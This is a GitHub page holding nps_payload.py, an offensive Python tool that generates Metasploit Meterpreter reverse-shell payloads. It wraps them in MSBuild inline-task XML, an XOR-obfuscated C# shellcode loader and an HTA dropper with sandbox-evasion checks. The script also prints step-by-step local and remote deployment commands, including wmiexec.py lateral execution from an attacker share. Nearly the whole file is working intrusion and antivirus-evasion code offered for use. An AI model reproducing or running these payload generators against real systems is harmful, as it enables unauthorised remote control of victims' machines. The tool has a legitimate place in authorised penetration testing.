forked from trustedsec/nps_payload
-
Notifications
You must be signed in to change notification settings - Fork 8
/
Copy pathnps_payload.py
executable file
·623 lines (537 loc) · 23.4 KB
/
nps_payload.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Written by Larry Spohn (@Spoonman1091)
# Payload written by Ben Mauch (@Ben0xA) aka dirty_ben
# TrustedSec, LLC
# https://www.trustedsec.com
# CSharp payload by Franci Šacer (@francisacer1)
from __future__ import print_function
import os
import sys
import netifaces as nic
import pexpect
import base64
class bcolors:
BLUE = '\033[94m'
GREEN = '\033[92m'
WARNING = '\033[93m'
WHITE = '\033[97m'
ERROR = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
listener_ip = "127.0.0.1"
# Configure for auto detection of local IP Address
local_interface = "eth0"
try:
raw_input # Python 2
except NameError:
raw_input = input # Python 3
# Enumerate the local IP assigned to "iface"
def get_local_ip(iface):
try:
nic.ifaddresses(iface)
local_ip = nic.ifaddresses(iface)[2][0]['addr']
return local_ip
except:
pass
def generate_msfvenom_payload(msf_payload):
global listener_ip
if (listener_ip == "127.0.0.1"):
local_ip = get_local_ip(local_interface)
listener_ip = raw_input("Enter Your Local IP Address (%s): " % local_ip) or local_ip
# Get listern port from user
msf_port = raw_input("Enter the listener port (443): ") or 443
# Generate PSH payload
print(bcolors.BLUE + "[*]" + bcolors.ENDC + " Generating PSH Payload...")
output = pexpect.run("msfvenom -p %s LHOST=%s LPORT=%s --arch x86 --platform win -f psh -o msf_payload.ps1" % (msf_payload,listener_ip,msf_port))
# Generate resource script
print(bcolors.BLUE + "[*]" + bcolors.ENDC + " Generating MSF Resource Script...")
msf_resource_file = open("msbuild_nps.rc", "a")
payload_listener = "\nset payload %s\nset LHOST %s\nset LPORT %s\nset ExitOnSession false\nset EnableStageEncoding true\nexploit -j -z" % (msf_payload, listener_ip, msf_port)
msf_resource_file.write(payload_listener)
msf_resource_file.close()
def encode_pshpayload(payload_file):
global psh_payload
psh_file = open(payload_file, "r")
psh_payload = psh_file.read() + "for (;;){\n Start-sleep 60\n}"
psh_payload = base64.b64encode(psh_payload.encode('utf-8'))
psh_file.close()
return psh_payload
def generate_msbuild_nps_msf_payload():
global psh_payload
global listener_ip
# Delete old resource script
if os.path.exists("msbuild_nps.rc"):
os.remove("msbuild_nps.rc")
# Initilize new resource script
msf_resource_file = open("msbuild_nps.rc", "a")
msf_resource_file.write("use multi/handler")
msf_resource_file.close()
# Display options to the user
print("\nPayload Selection:")
print("\n\t(1)\twindows/meterpreter/reverse_tcp")
print("\t(2)\twindows/meterpreter/reverse_http")
print("\t(3)\twindows/meterpreter/reverse_https")
print("\t(4)\tCustom PS1 Payload")
options = {1: "windows/meterpreter/reverse_tcp",
2: "windows/meterpreter/reverse_http",
3: "windows/meterpreter/reverse_https",
4: "custom_ps1_payload"
}
# Generate payload
try:
msf_payload = input("\nSelect payload: ")
if (options.get(msf_payload) == "custom_ps1_payload"):
custom_ps1 = raw_input("Enter the location of your custom PS1 file: ")
encode_pshpayload(custom_ps1)
else:
generate_msfvenom_payload(options.get(msf_payload))
encode_pshpayload("msf_payload.ps1")
except KeyError:
pass
# Create msbuild_nps.xml
msbuild_nps_file = open("msbuild_nps.xml", "w")
msbuild_nps_file.write("""<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes c# code. -->
<!-- C:\Windows\Microsoft.NET\Framework64\\v4.0.30319\msbuild.exe nps.xml -->
<!-- Original MSBuild Author: Casey Smith, Twitter: @subTee -->
<!-- NPS Created By: Ben Ten, Twitter: @ben0xa -->
<!-- License: BSD 3-Clause -->
<Target Name="npscsharp">
<nps />
</Target>
<UsingTask
TaskName="nps"
TaskFactory="CodeTaskFactory"
AssemblyFile="C:\Windows\Microsoft.Net\Framework\\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
<Task>
<Reference Include="System.Management.Automation" />
<Code Type="Class" Language="cs">
<![CDATA[
using System;
using System.Collections.ObjectModel;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using Microsoft.Build.Framework;
using Microsoft.Build.Utilities;
public class nps : Task, ITask
{
public override bool Execute()
{
string cmd = "%s";
PowerShell ps = PowerShell.Create();
ps.AddScript(Base64Decode(cmd));
Collection<PSObject> output = null;
try
{
output = ps.Invoke();
}
catch(Exception e)
{
Console.WriteLine("Error while executing the script.\\r\\n" + e.Message.ToString());
}
if (output != null)
{
foreach (PSObject rtnItem in output)
{
Console.WriteLine(rtnItem.ToString());
}
}
return true;
}
public static string Base64Encode(string text) {
return System.Convert.ToBase64String(System.Text.Encoding.UTF8.GetBytes(text));
}
public static string Base64Decode(string encodedtext) {
return System.Text.Encoding.UTF8.GetString(System.Convert.FromBase64String(encodedtext));
}
}
]]>
</Code>
</Task>
</UsingTask>
</Project>""" % psh_payload)
print(bcolors.GREEN + "[+]" + bcolors.ENDC + " Metasploit resource script written to msbuild_nps.rc")
print(bcolors.GREEN + "[+]" + bcolors.ENDC + " Payload written to msbuild_nps.xml")
print("\n1. Run \"" + bcolors.WHITE + "msfconsole -r msbuild_nps.rc" + bcolors.ENDC + "\" to start listener.")
print("2. Choose a Deployment Option (a or b): - See README.md for more information.")
print(" a. Local File Deployment:\n" + bcolors.WHITE + " - %windir%\\Microsoft.NET\\Framework\\v4.0.30319\\msbuild.exe <folder_path_here>\\msbuild_nps.xml" + bcolors.ENDC)
print(" b. Remote File Deployment:\n" + bcolors.WHITE + " - wmiexec.py <USER>:'<PASS>'@<RHOST> cmd.exe /c start %windir%\\Microsoft.NET\\Framework\\v4.0.30319\\msbuild.exe \\\\<attackerip>\\<share>\\msbuild_nps.xml" + bcolors.ENDC)
print("3. Hack the Planet!!")
sys.exit(0)
def generate_msfvenom_raw_payload(msf_payload):
global listener_ip
if (listener_ip == "127.0.0.1"):
local_ip = get_local_ip(local_interface)
listener_ip = raw_input("Enter Your Local IP Address (%s): " % local_ip) or local_ip
# Get listern port from user
msf_port = raw_input("Enter the listener port (443): ") or 443
# Generate PSH payload
print(bcolors.BLUE + "[*]" + bcolors.ENDC + " Generating RAW shellcode Payload...")
output = pexpect.run("msfvenom -p %s LHOST=%s LPORT=%s --arch x86 --platform win -f raw -o shell.raw" % (msf_payload,listener_ip,msf_port))
# Generate resource script
print(bcolors.BLUE + "[*]" + bcolors.ENDC + " Generating MSF Resource Script...")
msf_resource_file = open("msbuild_nps.rc", "a")
payload_listener = "\nset payload %s\nset LHOST %s\nset LPORT %s\nset ExitOnSession false\nset EnableStageEncoding true\nexploit -j -z" % (msf_payload, listener_ip, msf_port)
msf_resource_file.write(payload_listener)
msf_resource_file.close()
def encode_csharppayload(payload_file):
global csharp_payload
raw_file = open(payload_file, "rb")
raw_b64 = base64.b64encode(raw_file.read())
from itertools import cycle, izip
import random, string
key = ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.digits + string.ascii_lowercase) for _ in range(20))
cryptedMessage = ''.join(chr(ord(c)^ord(k)) for c,k in izip(raw_b64, cycle(key)))
str_shellcode = base64.b64encode(cryptedMessage.encode('utf-8'))
raw_file.close()
# Create launcher class
launcher = """
using System;
using System.Runtime.InteropServices;
using System.Text;
public class ClassExample
{
private static UInt32 MEM_COMMIT = 0x1000;
private static UInt32 PAGE_READWRITE = 0x04;
private static UInt32 PAGE_EXECUTE_READ = 0x20;
[DllImport("kernel32")]
private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect);
[DllImport("kernel32")]
private static extern bool VirtualProtect(IntPtr address, UInt32 size, UInt32 newProtect, out UInt32 oldProtect);
[DllImport("kernel32")]
private static extern IntPtr CreateThread(
UInt32 lpThreadAttributes,
UInt32 dwStackSize,
UInt32 lpStartAddress,
IntPtr param,
UInt32 dwCreationFlags,
ref UInt32 lpThreadId
);
[DllImport("kernel32")]
private static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);
public void Execute() {
string raw = @"%s";
byte[] shellcode = Convert.FromBase64String(xorIt("%s", Base64Decode(raw)));
UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length, MEM_COMMIT, PAGE_READWRITE);
Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);
UInt32 oldProtect;
VirtualProtect((IntPtr)(funcAddr), (UInt32)shellcode.Length, PAGE_EXECUTE_READ, out oldProtect);
IntPtr hThread = IntPtr.Zero;
UInt32 threadId = 0;
IntPtr pinfo = IntPtr.Zero;
hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
WaitForSingleObject(hThread, 0xFFFFFFFF);
}
public static string xorIt(string key, string input)
{
StringBuilder sb = new StringBuilder();
for(int i=0; i < input.Length; i++)
sb.Append((char)(input[i] ^ key[(i %% key.Length)]));
String result = sb.ToString();
return result;
}
public static string Base64Encode(string text) {
return System.Convert.ToBase64String(System.Text.Encoding.UTF8.GetBytes(text));
}
public static string Base64Decode(string encodedtext) {
return System.Text.Encoding.UTF8.GetString(System.Convert.FromBase64String(encodedtext));
}
}""" % (str_shellcode, key)
launcher_b64 = base64.b64encode(launcher.encode('utf-8'))
csharp_payload = launcher_b64
return launcher_b64
def generate_msbuild_nps_msf_csharp_payload():
global listener_ip
global csharp_payload
# Delete old resource script
if os.path.exists("msbuild_nps.rc"):
os.remove("msbuild_nps.rc")
# Initilize new resource script
msf_resource_file = open("msbuild_nps.rc", "a")
msf_resource_file.write("use multi/handler")
msf_resource_file.close()
# Display options to the user
print("\nPayload Selection:")
print("\n\t(1)\twindows/meterpreter/reverse_tcp")
print("\t(2)\twindows/meterpreter/reverse_http")
print("\t(3)\twindows/meterpreter/reverse_https")
options = {1: "windows/meterpreter/reverse_tcp",
2: "windows/meterpreter/reverse_http",
3: "windows/meterpreter/reverse_https"
}
# Generate payload
try:
msf_payload = input("\nSelect payload: ")
generate_msfvenom_raw_payload(options.get(msf_payload))
encode_csharppayload("shell.raw")
except KeyError:
pass
# Create msbuild_nps.xml
msbuild_nps_file = open("msbuild_nps.xml", "w")
msbuild_nps_file.write("""<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes c# code. -->
<!-- C:\Windows\Microsoft.NET\Framework64\\v4.0.30319\msbuild.exe nps.xml -->
<!-- Original MSBuild Author: Casey Smith, Twitter: @subTee -->
<!-- NPS Created By: Ben Ten, Twitter: @ben0xa -->
<!-- Created C# payload: Franci Sacer, Twitter: @francisacer1 -->
<!-- License: BSD 3-Clause -->
<Target Name="npscsharp">
<nps />
</Target>
<UsingTask
TaskName="nps"
TaskFactory="CodeTaskFactory"
AssemblyFile="C:\Windows\Microsoft.Net\Framework\\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
<Task>
<Code Type="Class" Language="cs">
<![CDATA[
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Runtime.InteropServices;
using System.Collections.ObjectModel;
using Microsoft.Build.Framework;
using Microsoft.Build.Utilities;
using Microsoft.CSharp;
using System.CodeDom.Compiler;
using System.Reflection;
public class nps : Task, ITask
{
public override bool Execute()
{
Console.WriteLine("hey");
string cmd = "%s";
CSharpCodeProvider nps = new CSharpCodeProvider();
CompilerParameters parameters = new CompilerParameters();
parameters.ReferencedAssemblies.Add("System.dll");
parameters.ReferencedAssemblies.Add("System.Runtime.InteropServices.dll");
parameters.GenerateExecutable = false;
parameters.GenerateInMemory = true;
parameters.IncludeDebugInformation = false;
CompilerResults results = nps.CompileAssemblyFromSource(parameters, Base64Decode(cmd));
Assembly assembly = results.CompiledAssembly;
object obj = assembly.CreateInstance("ClassExample");
obj.GetType().InvokeMember("Execute", BindingFlags.InvokeMethod, null, obj, null);
return true;
}
public static string Base64Encode(string text) {
return System.Convert.ToBase64String(System.Text.Encoding.UTF8.GetBytes(text));
}
public static string Base64Decode(string encodedtext) {
return System.Text.Encoding.UTF8.GetString(System.Convert.FromBase64String(encodedtext));
}
}
]]>
</Code>
</Task>
</UsingTask>
</Project>""" % csharp_payload)
print(bcolors.GREEN + "[+]" + bcolors.ENDC + " Metasploit resource script written to msbuild_nps.rc")
print(bcolors.GREEN + "[+]" + bcolors.ENDC + " Payload written to msbuild_nps.xml")
print("\n1. Run \"" + bcolors.WHITE + "msfconsole -r msbuild_nps.rc" + bcolors.ENDC + "\" to start listener.")
print("2. Choose a Deployment Option (a or b): - See README.md for more information.")
print(" a. Local File Deployment:\n" + bcolors.WHITE + " - %windir%\\Microsoft.NET\\Framework\\v4.0.30319\\msbuild.exe <folder_path_here>\\msbuild_nps.xml" + bcolors.ENDC)
print(" b. Remote File Deployment:\n" + bcolors.WHITE + " - wmiexec.py <USER>:'<PASS>'@<RHOST> cmd.exe /c start %windir%\\Microsoft.NET\\Framework\\v4.0.30319\\msbuild.exe \\\\<attackerip>\\<share>\\msbuild_nps.xml" + bcolors.ENDC)
print("3. Hack the Planet!!")
sys.exit(0)
def generate_msbuild_nps_msf_hta_payload():
global psh_payload
global listener_ip
psh_payload = ""
psh_payloads = ""
payload_count = 1
# Delete old resource script
if os.path.exists("msbuild_nps.rc"):
os.remove("msbuild_nps.rc")
# Initilize new resource script
msf_resource_file = open("msbuild_nps.rc", "a")
msf_resource_file.write("use multi/handler")
msf_resource_file.close()
while True:
# Display options to the user
print("\nPayload Selection:")
print("\n\t(1)\twindows/meterpreter/reverse_tcp")
print("\t(2)\twindows/meterpreter/reverse_http")
print("\t(3)\twindows/meterpreter/reverse_https")
print("\t(4)\tCustom PS1 Payload")
print("\t(99)\tFinished")
options = {1: "windows/meterpreter/reverse_tcp",
2: "windows/meterpreter/reverse_http",
3: "windows/meterpreter/reverse_https",
4: "custom_ps1_payload",
99: "finished"
}
# Generate payloads
try:
msf_payload = input("\nSelect multiple payloads. Enter 99 when finished: ")
if (options.get(msf_payload) == "finished"):
break
elif (options.get(msf_payload) == "custom_ps1_payload"):
custom_ps1 = raw_input("Enter the location of your custom PS1 file: ")
encode_pshpayload(custom_ps1)
else:
generate_msfvenom_payload(options.get(msf_payload))
encode_pshpayload("msf_payload.ps1")
os.remove("msf_payload.ps1")
# Generate payload vbs array string
if (payload_count == 1):
psh_payloads = "\"" + psh_payload + "\""
else:
psh_payloads += ", _\n\t\"" + psh_payload + "\""
payload_count += 1
except KeyError:
pass
# Create msbuild_nps.xml
msbuild_nps_file = open("msbuild_nps.hta", "w")
msbuild_nps_file.write("""<script language=vbscript>
On Error Resume Next
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objShell = CreateObject("WScript.Shell")
objTemp = objShell.ExpandEnvironmentStrings("%%TEMP%%")
objWindir = objShell.ExpandEnvironmentStrings("%%windir%%")
Set objWMIService = GetObject("winmgmts:\\\\.\\root\CIMV2")
arrUnicorns = Array(%s)
' Get logical processor count
Set colComputerSystem = objWMIService.ExecQuery("SELECT * FROM Win32_ComputerSystem")
For Each objComputerSystem In colComputerSystem
objProcessorCount = objComputerSystem.NumberofLogicalProcessors
Next
' Only run if system has more than 1 processor
' https://www.trustedsec.com/may-2015/bypassing-virtualization-and-sandbox-technologies/
If objProcessorCount > 1 Then
' Sleep 60 seconds
' https://www.sans.org/reading-room/whitepapers/malicious/sleeping-sandbox-35797
objShell.Run "%%COMSPEC%% /c ping -n 60 127.0.0.1>nul", 0, 1
For Each objUnicorn in arrUnicorns
x = x + 1
' Create MSBuild XML File
CreateMSBuildXML objUnicorn, x
' Execute resource(x).xml using msbuild.exe and nps
objShell.Run objWindir & "\Microsoft.NET\Framework\\v4.0.30319\msbuild.exe %%TEMP%%\\resource" & x & ".xml", 0
Next
' Cleanup
For y = 1 To x
Do While objFSO.FileExists(objTemp & "\\resource" & y & ".xml")
objShell.Run "%%COMSPEC%% /c ping -n 10 127.0.0.1>nul", 0, 1
objFSO.DeleteFile(objTemp & "\\resource" & y & ".xml")
Loop
Next
End If
window.close()
' Creates XML configuration files in the %%TEMP%% directory
Function CreateMSBuildXML(objUnicorn, x)
msbuildXML = "<Project ToolsVersion=" & CHR(34) & "4.0" & CHR(34) & " xmlns=" & CHR(34) & "http://schemas.microsoft.com/developer/msbuild/2003" & CHR(34) & ">" & vbCrLf &_
" <!-- This inline task executes c# code. -->" & vbCrLf &_
" <!-- C:\Windows\Microsoft.NET\Framework64\\v4.0.30319\msbuild.exe nps.xml -->" & vbCrLf &_
" <!-- Original MSBuild Author: Casey Smith, Twitter: @subTee -->" & vbCrLf &_
" <!-- NPS Created By: Ben Ten, Twitter: @ben0xa -->" & vbCrLf &_
" <!-- License: BSD 3-Clause -->" & vbCrLf &_
" <Target Name=" & CHR(34) & "npscsharp" & CHR(34) & ">" & vbCrLf &_
" <nps />" & vbCrLf &_
" </Target>" & vbCrLf &_
" <UsingTask" & vbCrLf &_
" TaskName=" & CHR(34) & "nps" & CHR(34) & "" & vbCrLf &_
" TaskFactory=" & CHR(34) & "CodeTaskFactory" & CHR(34) & "" & vbCrLf &_
" AssemblyFile=" & CHR(34) & "C:\Windows\Microsoft.Net\Framework\\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" & CHR(34) & " >" & vbCrLf &_
" <Task>" & vbCrLf &_
" <Reference Include=" & CHR(34) & "System.Management.Automation" & CHR(34) & " />" & vbCrLf &_
" <Code Type=" & CHR(34) & "Class" & CHR(34) & " Language=" & CHR(34) & "cs" & CHR(34) & ">" & vbCrLf &_
" <![CDATA[" & vbCrLf &_
"" & vbCrLf &_
" using System;" & vbCrLf &_
" using System.Collections.ObjectModel;" & vbCrLf &_
" using System.Management.Automation;" & vbCrLf &_
" using System.Management.Automation.Runspaces;" & vbCrLf &_
" using Microsoft.Build.Framework;" & vbCrLf &_
" using Microsoft.Build.Utilities;" & vbCrLf &_
"" & vbCrLf &_
" public class nps : Task, ITask" & vbCrLf &_
" {" & vbCrLf &_
" public override bool Execute()" & vbCrLf &_
" {" & vbCrLf &_
" string cmd = " & CHR(34) & objUnicorn & CHR(34) & ";" & vbCrLf &_
" " & vbCrLf &_
" PowerShell ps = PowerShell.Create();" & vbCrLf &_
" ps.AddScript(Base64Decode(cmd));" & vbCrLf &_
"" & vbCrLf &_
" Collection<PSObject> output = null;" & vbCrLf &_
" try" & vbCrLf &_
" {" & vbCrLf &_
" output = ps.Invoke();" & vbCrLf &_
" }" & vbCrLf &_
" catch(Exception e)" & vbCrLf &_
" {" & vbCrLf &_
" Console.WriteLine(" & CHR(34) & "Error while executing the script.\\r\\n" & CHR(34) & " + e.Message.ToString());" & vbCrLf &_
" }" & vbCrLf &_
" if (output != null)" & vbCrLf &_
" {" & vbCrLf &_
" foreach (PSObject rtnItem in output)" & vbCrLf &_
" {" & vbCrLf &_
" Console.WriteLine(rtnItem.ToString());" & vbCrLf &_
" }" & vbCrLf &_
" }" & vbCrLf &_
" return true;" & vbCrLf &_
" }" & vbCrLf &_
"" & vbCrLf &_
" public static string Base64Encode(string text) {" & vbCrLf &_
" return System.Convert.ToBase64String(System.Text.Encoding.UTF8.GetBytes(text));" & vbCrLf &_
" }" & vbCrLf &_
"" & vbCrLf &_
" public static string Base64Decode(string encodedtext) {" & vbCrLf &_
" return System.Text.Encoding.UTF8.GetString(System.Convert.FromBase64String(encodedtext));" & vbCrLf &_
" }" & vbCrLf &_
" }" & vbCrLf &_
" ]]>" & vbCrLf &_
" </Code>" & vbCrLf &_
" </Task>" & vbCrLf &_
" </UsingTask>" & vbCrLf &_
"</Project>"
Set objFile = objFSO.CreateTextFile(objTemp & "\\resource" & x & ".xml", True)
objFile.WriteLine(msbuildXML)
objFile.Close
End Function
</script>""" % psh_payloads)
print(bcolors.GREEN + "[+]" + bcolors.ENDC + " Metasploit resource script written to msbuild_nps.rc")
print(bcolors.GREEN + "[+]" + bcolors.ENDC + " Payload written to msbuild_nps.hta")
print("\n1. Run \"" + bcolors.WHITE + "msfconsole -r msbuild_nps.rc" + bcolors.ENDC + "\" to start listener.")
print("2. Deploy hta file to web server and navigate from the victim machine.")
print("3. Hack the Planet!!")
sys.exit()
# Exit Program
def quit():
sys.exit(0)
# Main guts
def main():
print("""
( (
) ( )\ ) )\ )
( ` ) ( ` ) ( /( )\ )((_)( ( /( (()/(
)\ ) /(/( )\ /(/( )(_)|()/( _ )\ )(_)) ((_)
_(_/(((_)_\((_) ((_)_\((_)_ )(_)) |((_)((_)_ _| |
| ' \)) '_ \|_-< | '_ \) _` | || | / _ \/ _` / _` |
|_||_|| .__//__/____| .__/\__,_|\_, |_\___/\__,_\__,_|
|_| |_____|_| |__/
v1.04
""")
while(1):
# Display options to the user
print("\n\t(1)\tGenerate msbuild/nps/msf payload")
print("\t(2)\tGenerate msbuild/nps/msf CSharp payload")
print("\t(3)\tGenerate msbuild/nps/msf HTA payload")
print("\t(99)\tQuit")
options = {1: generate_msbuild_nps_msf_payload,
2: generate_msbuild_nps_msf_csharp_payload,
3: generate_msbuild_nps_msf_hta_payload,
99: quit,
}
try:
task = input("\nSelect a task: ")
options[task]()
except KeyError:
pass
# Standard boilerplate to call the main() function
if __name__ == '__main__':
main()